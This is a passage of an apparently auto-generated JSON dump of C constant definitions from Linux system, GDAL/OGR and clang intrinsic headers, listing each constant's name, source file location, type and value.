"value": 200809 }, { "tag": "const", "name": "__DECL_SIMD_cosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ECHRNG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 44 }, { "tag": "const", "name": "_BITS_POSIX_OPT_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__DECL_SIMD_cos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EL2NSYNC", "ns": 0, "location": "/usr/include/asm-generic/errno.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 45 }, { "tag": "const", "name": "__S_IFMT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:179:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 61440 }, { "tag": "const", "name": "_BITS_LIBM_SIMD_DECL_STUBS_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EWOULDBLOCK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:22:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "EIDRM", "ns": 0, "location": "/usr/include/asm-generic/errno.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 43 }, { "tag": "const", "name": "_POSIX_THREAD_ATTR_STACKSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:79:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_THREAD_PRIO_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:85:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "ENOMSG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 42 }, { "tag": "const", "name": "__DECL_SIMD_cosf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_SEMAPHORES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "EUNATCH", "ns": 0, "location": "/usr/include/asm-generic/errno.h:30:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 49 }, { "tag": "const", "name": "__DECL_SIMD_cosf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:40:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ENOCSI", "ns": 0, "location": "/usr/include/asm-generic/errno.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 50 }, { "tag": "const", "name": "EL2HLT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 51 }, { "tag": "const", "name": "__DECL_SIMD_cosf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:39:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EL3HLT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 46 }, { "tag": "const", "name": "_POSIX_THREAD_ROBUST_PRIO_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:93:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "ELNRNG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 48 }, { "tag": "const", "name": "__DECL_SIMD_cosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_THREAD_ATTR_STACKADDR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:82:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "EL3RST", "ns": 0, "location": "/usr/include/asm-generic/errno.h:28:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 47 }, { "tag": "const", "name": "ENOANO", "ns": 0, "location": "/usr/include/asm-generic/errno.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 55 }, { "tag": "const", "name": "_POSIX_THREADS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_XOPEN_SHM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EXFULL", "ns": 0, "location": "/usr/include/asm-generic/errno.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 54 }, { "tag": "const", "name": "EBADRQC", "ns": 0, "location": "/usr/include/asm-generic/errno.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 56 }, { "tag": "const", "name": "_XOPEN_REALTIME_THREADS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__DECL_SIMD_cosf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EBADE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 52 }, { "tag": "const", "name": "_XOPEN_REALTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:60:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_THREAD_ROBUST_PRIO_PROTECT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:96:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "__DECL_SIMD_cosf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:42:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EBADR", "ns": 0, "location": "/usr/include/asm-generic/errno.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 53 }, { "tag": "const", "name": "_POSIX_NO_TRUNC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ENOSTR", "ns": 0, "location": "/usr/include/asm-generic/errno.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 60 }, { "tag": "const", "name": "__S_IFSOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:188:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 49152 }, { "tag": "const", "name": "_POSIX_THREAD_PRIORITY_SCHEDULING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:76:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "__S_IFLNK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:187:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 40960 }, { "tag": "const", "name": "ENODATA", "ns": 0, "location": "/usr/include/asm-generic/errno.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 61 }, { "tag": "const", "name": "_POSIX_THREAD_SAFE_FUNCTIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:73:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "__S_IFIFO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:186:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "OLMD_FID64", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:791:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "OLMD_FID64" }, { "tag": "const", "name": "EBADSLT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 57 }, { "tag": "const", "name": "_POSIX_REENTRANT_FUNCTIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EBFONT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:42:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 59 }, { "tag": "const", "name": "__S_IFCHR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:183:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8192 }, { "tag": "const", "name": "_STATBUF_ST_BLKSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:172:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EDEADLOCK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:40:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 35 }, { "tag": "const", "name": "_STATBUF_ST_NSEC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:175:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__S_IFBLK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:184:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24576 }, { "tag": "const", "name": "__S_IFDIR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:182:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16384 }, { "tag": "const", "name": "_STATBUF_ST_RDEV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:173:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__S_IFREG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:185:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "CPLE_AssertionFailed", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "CPLE_NoWriteAccess", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:113:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "CPLE_UserInterrupt", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:115:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "GDAL_VERSION_INFO_DEFINED", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:923:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLE_ObjectNull", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:117:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "_kxor_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8410:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLE_HttpResponse", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:123:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "_kxnor_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8409:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLE_AWSBucketNotFound", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:125:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "CPLE_AWSObjectNotFound", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:127:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 13 }, { "tag": "const", "name": "CPLE_AWSAccessDenied", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:129:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "_kor_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8408:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_knot_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8407:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLE_None", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:97:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "CPLE_AppDefined", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:99:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CPLE_OutOfMemory", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:101:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "CPLE_OpenFailed", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:105:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "CPLE_FileIO", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:103:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "CPLE_IllegalArg", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:107:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "CPLE_NotSupported", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "__INO_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__GID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:40:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__MODE_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__INO64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:42:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FSWORD_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:46:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__OFF_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__NLINK_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:45:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__COMPAR_FN_T", "ns": 0, "location": "/usr/include/stdlib.h:804:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__OFF64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPLE_AWSSignatureDoesNotMatch", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:133:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "CPLE_AWSInvalidCredentials", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:131:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 15 }, { "tag": "const", "name": "CPLE_AWSError", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:135:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 17 }, { "tag": "const", "name": "__SYSCALL_SLONG_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:34:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_TYPESIZES_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__UID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:39:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SYSCALL_ULONG_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:35:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DEV_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__TIME_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:64:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CLOCK_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:62:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SUSECONDS_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__USECONDS_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:65:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__KEY_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:68:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_GETOPT_CORE_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_core.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__DADDR_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_GETOPT_POSIX_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/getopt_posix.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__TIMER_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:70:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CLOCKID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__RLIM64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__RLIM_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__BLKCNT64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__BLKCNT_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:56:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FSBLKCNT64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:59:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FSBLKCNT_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FSFILCNT64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:61:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FSFILCNT_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:60:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGR_F_VAL_GEOM_TYPE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:553:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "OGR_F_VAL_WIDTH", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:559:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__POPCNTINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/popcntintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGR_F_VAL_ALLOW_NULL_WHEN_DEFAULT", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:568:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__WMMINTRIN_AES_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGR_F_VAL_ALLOW_DIFFERENT_GEOM_DIM", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:576:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "__WMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/wmmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGR_F_VAL_ALL", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:582:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483631 }, { "tag": "const", "name": "__ADXINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/adxintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "GDAL_DS_LAYER_CREATIONOPTIONLIST", "ns": 0, "location": "/usr/include/gdal/gdal.h:620:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DS_LAYER_CREATIONOPTIONLIST" }, { "tag": "const", "name": "HACK_FOR_IBM_DB2_V72", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:498:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ALTER_NAME_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:514:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ALTER_TYPE_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:519:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "ALTER_WIDTH_PRECISION_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:524:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "ALTER_NULLABLE_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:530:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "ALTER_DEFAULT_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:536:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "ALTER_ALL_FLAG", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:541:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 31 }, { "tag": "const", "name": "OGR_F_VAL_NULL", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:547:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "OGRUnsetMarker", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:665:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -21121 }, { "tag": "const", "name": "OGRNullMarker", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:673:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -21122 }, { "tag": "const", "name": "__LOCK_ALIGNMENT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:62:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PTHREAD_MUTEX_USE_UNION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:56:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__ONCE_ALIGNMENT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PTHREAD_MUTEX_LOCK_ELISION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__PTHREAD_COMPAT_PADDING_END", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PTHREAD_MUTEX_NUSERS_AFTER_KIND", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:55:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_RWLOCKATTR_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_CONDATTR_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:46:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": 